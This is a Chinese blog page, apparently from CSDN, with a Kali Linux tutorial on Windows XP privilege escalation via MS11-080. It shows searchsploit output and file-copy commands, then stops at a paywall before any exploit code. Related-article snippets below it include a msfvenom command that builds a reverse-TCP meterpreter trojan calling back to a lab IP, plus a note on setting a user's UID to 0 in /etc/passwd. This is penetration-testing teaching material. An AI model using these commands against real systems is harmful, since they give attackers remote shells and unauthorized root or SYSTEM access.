【kali】29 提权—— 利用漏洞提权

最新推荐文章于 2024-02-13 08:00:00 发布
最新推荐文章于 2024-02-13 08:00:00 发布
阅读量7.9k 收藏 15
点赞数 5
文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/grb819/article/details/121488045
版权

这里写自定义目录标题

一、使用 Ms011-080 获取 WinXP 的 SYSTEM 权限

1. Ms011-080 对应补丁 Kb2592799

微软官网公告(https://technet.microsoft.com/library/security/ms11-080)
在这里插入图片描述

2. kali集成了exploit

┌──(root💀kali)-[/home/kali-2]
└─# searchsploit Ms11-080
------------------------------------------------------------- ---------------------------------
 Exploit Title                                               |  Path
------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'AfdJoinLeaf' Local Privilege Escalation | windows/local/21844.rb
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escala | windows/local/18176.py
------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

两个脚本

3. 查看.py

  • 原理缓冲区溢出
  • 拷贝
cp /usr/share/exploitdb/exploits/windows/local/18176.py /home/kali-3/Desktop/桌面


┌──(root💀kali)-[/home/kali-2]
└─# cat /usr/share/exploitdb/exploits/windows/local/18176.py                               1 ⨯
################################################################################
<
最低0.47元/天 解锁文章
(∪.∪ )...zzz
关注
  • 5
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali Linux渗透测试——提权
Captain_RB的博客
03-03 4437
Kali Linux渗透测试——提权 笔记内容参考安全牛苑房弘老师的Kali Linux渗透测试教程 文章目录Kali Linux渗透测试——提权一、关于权限(一)WindowsNT(二)Linux 一、关于权限 对不同的用户设置合适的权限是保证多任务操作系统安全的重要一环,取得shell并拿到系统权限,就相当于完全掌握了攻击目标的控制权。设置用户权限的一个基本原则即:设置最少的服务,分配最小...
漏洞利用提权
09-20
ID tdcoming 的白帽子的演讲PPT,共43页。详细介绍了漏洞利用的各个步骤,值得一看
权限提升:利用Linux漏洞提权
最新发布
qq_68163788的博客
02-13 2450
Linux漏洞提权是指利用Linux系统中存在的漏洞,通过特定的方法来获取更高的权限。这种方法通常被黑客用来获取系统管理员权限,从而可以对系统进行更深入的攻击和控制。 一种常见的Linux漏洞提权方法是利用内核漏洞。内核是操作系统的核心部分,负责管理系统的资源和提供各种功能。如果内核中存在漏洞,黑客可以利用这些漏洞来提升权限。例如,通过利用内核中的缓冲区溢出漏洞,黑客可以在系统中执行恶意代码,并获取更高的权限。
内网渗透 -- 提升权限(利用提权漏洞)
weixin_41489908的博客
07-01 354
沉默不是没有情绪,是感觉没有再说的意义。。。。 ---- 网易云热评 环境:小攻:Kali 2020,ip:192.168.1.133 小受:win7 x86,ip:192.168.1.137 一、生成木马 1、查看Windows下可利用的payloads msfvenom -l payloads | grep windows | grep tcp 2、选择windows/meterpreter/reverse_tcp并生成木马 -p 选择一个payload ...
Kali Linux渗透测试—提权(一)——本地提权
weixin_45116657的博客
08-18 1961
本地提权: 目前系统都是多用户操作系统,可以登录多个账户,实现权限的隔离。针对不同的应用——对应不同的账户——不同的账户在对应不同的权限; 本地提权一般用于已经获取到了本地低权限的账号,希望获取更高的权限,实现对目标的进一步控制; 简单而言,本地提权漏洞就是说一个本来非常低权限、受限制的用户,可以提升到系统至高无上的权限,权限控制是WINDOWS、Linux等系统安全的基石,也是一切安全软件的基...
安卓——Kali_linux操作文档.zip
10-25
3. 利用硬件支持:部分高配安卓设备可以通过Linux on DeX或Kernel-Based Virtual Machine (KVM) 直接运行Kali Linux的完整桌面版。 三、Kali Linux在安卓设备上的基本操作 1. 终端使用:掌握bash shell的基本命令,...
kali Linux渗透基础知识.pdf
01-25
本文将详细介绍Kali Linux渗透基础知识中的关键环节——信息收集。 信息收集是渗透测试的第一步,它涉及对目标系统进行情报分析、扫描探测、服务查点和漏洞搜索,甚至利用社会工程学技巧获取信息。这一过程旨在了解...
kali-linux-2017.3-vm-i386.zip
12-21
Kali Linux中,用户可以找到各种渗透测试工具,如Nmap用于网络扫描,Metasploit用于漏洞利用,Wireshark用于网络抓包分析等。对于安全专业人员、黑客道德测试者和网络安全学习者来说,这是一个非常有价值的资源。...
kalirouter:拦截kali路由器
02-05
"kalirouter"项目则是针对Kali Linux的一个扩展,旨在将其功能扩展到路由器设备上,使用户能够利用Kali Linux的强大功能监控和控制网络流量。这一技术尤其适用于渗透测试和网络监控场景。 【描述】:“kalirouter:...
Kali使用手册top10工具part3
10-13
它提供了多种工具,帮助安全专家发现并利用漏洞。Burp Suite主要由以下几个组件构成: 1. **Proxy**:这是Burp的核心组件,作为一个HTTP/HTTPS代理服务器,它允许你在浏览器和目标web应用之间拦截、查看、修改和...
Kali安全渗透测试实践教程】第5章 漏洞利用
小原的博客
08-06 842
Kali安全渗透测试实践教程】第5章 漏洞利用
kali提升root权限
cuisidong1997的博客
11-27 1564
4、按 i 进入编辑模式,将想要提升权限的用户名后面的1000:1000改为0:0;5、按esc退出后,按 wq 或 shift+zz保存退出;6、reboot重启。
kali实施文件上传漏洞攻击:
彭淦淦的博客
05-09 2558
3.1 问题 1)DVWA搭建在Win2008虚拟机(192.168.111.142) 2)在宿主机访问DVWA,DVWA级别分别设置Low、Medium 3)利用文件上传漏洞,使用kali(192.168.111.142)攻击 3.2 步骤 实现此案例需要按照如下步骤进行。 步骤一:DVWA级别设置Low 1)访问DVWA,选择Low级别,然后点击“File Upload”,如图-26所示 图-26 2)使用kali下的weevely来生成一个webshell,密码123456,如图-
Web的基本漏洞--提权
尽欢的博客
06-05 463
提权的介绍
kali linux之本地提权
weixin_30593261的博客
02-25 368
已实现本地低权限帐号登录,希望获取更高权限,实现对目标进一步控制 系统帐号之间权限隔离(操作系统安全的基础,用户空间,内核空间) 系统帐号(用户帐号登录时获取权限令牌,服务帐号无需用户登录已在后台启动服务) windows---user,administrator,system windows---system帐号 系统设置管理员功能, 创建一个system服务,名字叫sys...
Metasploit利用ms15-051漏洞进行权限提权
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
04-01 3667
Metasploit利用ms15-051漏洞进行权限提权 实验环境 虚拟机:kali-linux(攻击机) 192.168.18.142 window server 2003(靶机) 192.168.18.146 工具:Metasploit 步骤: 1、生成木马文件: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.142 lport=4444 -f exe -o /root/shell.exe 2、服务器网站目录上创建个shell
Kali Linux渗透测试之提权(一)——本地提权
qq_29864185的博客
07-08 2936
目录 本地提权 Windows系统用户权限划分 Linux系统用户权限划分 1. Windows系统下进行提权 (1)查看当前用户的信息;(前提:进行提权的用户是administrator权限) (2)提权——Psexec (3)提权——At (4)使所有cmd命令行窗口都是以system权限打开 (6)注入进程提权,隐蔽痕迹——Pinjecter 2. Linux系统下进行提权 本地提权 目前系统都是多用户操作系统,可以登录多个账户,实现权限的隔离,针对不同的应用,对应不同的账户
kali-权限提升】(4.2.7)社会工程学工具包:权限维持创建后门、清除痕迹
08-09 873
【权限维持】创建后门、清除痕迹
kali永久提root权限
lrz1876的博客
01-17 7400
进入终端后输入 输入sudo su 输入kali密码(一般都是kali) 输入sudo -i 输入vim /etc/passwd(注意vim后有个空格) 5.找到倒数第二行的两个1000都改成0(光标指定后输入i就可以编辑) 改好之后按住shift然后按Z两下就可以保存,然后按esc退出,输入命令reboot重启kali就可以了 学习内容来自链接:link. 如有冒犯,请及时告知,一定及时删除! ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值